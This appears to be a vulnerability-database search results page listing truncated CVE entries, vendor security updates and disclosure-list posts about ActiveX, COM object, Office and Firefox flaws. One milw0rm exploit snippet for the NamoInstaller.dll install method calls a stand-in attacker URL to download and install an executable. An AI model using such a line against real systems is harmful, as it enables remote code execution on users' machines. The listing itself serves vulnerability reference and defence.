73 matches found
Cumulative Security Update for Internet Explorer (937143)
Unspecified vulnerability in the pdwizard.ocx ActiveX object for Internet Explorer 5.01, 6 SP1, and 7 allows remote attackers to execute arbitrary code via unknown vectors related to Microsoft Visual Basic 6 objects and memory corruption, aka ActiveX Object Memory Corruption Vulnerability. OpenVA...
CVE-2010-1253
Microsoft Office Excel 2002 SP3, 2007 SP1, and SP2; Office 2004 for mac; Office 2008 for Mac; Open XML File Format Converter for Mac; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2; allows remote attackers to execute arbitrary code via an Excel file wi...
Design/Logic Flaw
Microsoft Office Excel 2002 SP3, 2007 SP1, and SP2; Office 2004 for mac; Office 2008 for Mac; Open XML File Format Converter for Mac; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2; allows remote attackers to execute arbitrary code via an Excel file wi...
Sejoong Namo ActiveSquare 6 - NamoInstaller.dll install Method
Sejoong Namo ActiveSquare 6 - NamoInstaller.dll install Method Namo Web Editor NamoInstaller.dll install Method Exploit function Check obj.Install"http://ATTACKER.COM/HACK.EXE" Unable to create object tml -- milw0rm.com 2008-01-25...
SuSE 10 Security Update : Firefox (ZYPP Patch Number 1960)
This security update brings Mozilla Firefox to version 1.5.0.6. More details can be found on: http://www.mozilla.org/projects/security/known-vulnerabiliti es.html It includes fixes to the following security problems : - Code execution through deleted frame reference. CVE-2006-3801 / MFSA 2006-44...
openSUSE 10 Security Update : MozillaFirefox (MozillaFirefox-2251)
This update brings MozillaFirefox to the security update release 1.5.0.8, including the following security fixes. Full details can be found on: http://www.mozilla.org/projects/security/known-vulnerabilities.html MFSA2006-65: Is split into 3 sub-entries, for ongoing stability improvements in the...
[Full-disclosure] MSIE Nested Object Vulnerability Is Exploitable
Hello, There has recently been some discussion regarding whether or not the MSIE Nested Object Vulnerability reported by Michal Zalewski is exploitable or not. Link to Michal Zalewski Full-Disclosure Posting: http://lists.grok.org.uk/pipermail/full-disclosure/2006- April/045422.html Because of...
CVE-2005-3581
GDAL before 1.3.0-r1 allows local users in the portage group to increase privileges via a shared object in the Portage temporary build directory, which is added to the search path allowing objects in it to be loaded at runtime...
Sun Java Runtime Environment 1.4.x - Font Object Assertion Failure Denial of Service
Sun Java Runtime Environment 1.4.x - Font Object Assertion Failure Denial of Service source: https://www.securityfocus.com/bid/10623/info The Sun Java Runtime Environment Font object is reportedly vulnerable to an assertion failure denial of service vulnerability. This issue is due to a failure o...
Mcafee FreeScan CoMcFreeScan Browser - Information Disclosure
Mcafee FreeScan CoMcFreeScan Browser - Information Disclosure source: https://www.securityfocus.com/bid/10077/info Reportedly the Mcafee FreeScan 'McFreeScan.CoMcFreeScan.1' COM object is prone to a remote information disclosure vulnerability. This issue is due to a failure of the object to...
Symantec Security Check Virus Detection - COM Object Denial of Service
Symantec Security Check Virus Detection - COM Object Denial of Service source: https://www.securityfocus.com/bid/10069/info Symantec Virus Detection is a web based service that detects viruses and trojan horses. It is a freely available service that can be run via Microsoft Internet Explorer,...
Re: BAD NEWS: Microsoft Security Bulletin MS03-032
The patch for Drew's object data=funky.hta doesn't work: This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which explains the problem in detail. Microsoft again patches the object element in HTML, but it doesn't patch the dynamic version of that same element. 1. Disable Active...
HHControl Object (showHelp) may execute shortcuts embedded in help files
Overview The HHCtrl ActiveX control has a serious vulnerability that allows remote intruders to execute arbitrary code, if the intruder can cause a compiled help file CHM to be stored "locally." Microsoft has released a security bulletin and a patch for this vulnerability, but the patch does not...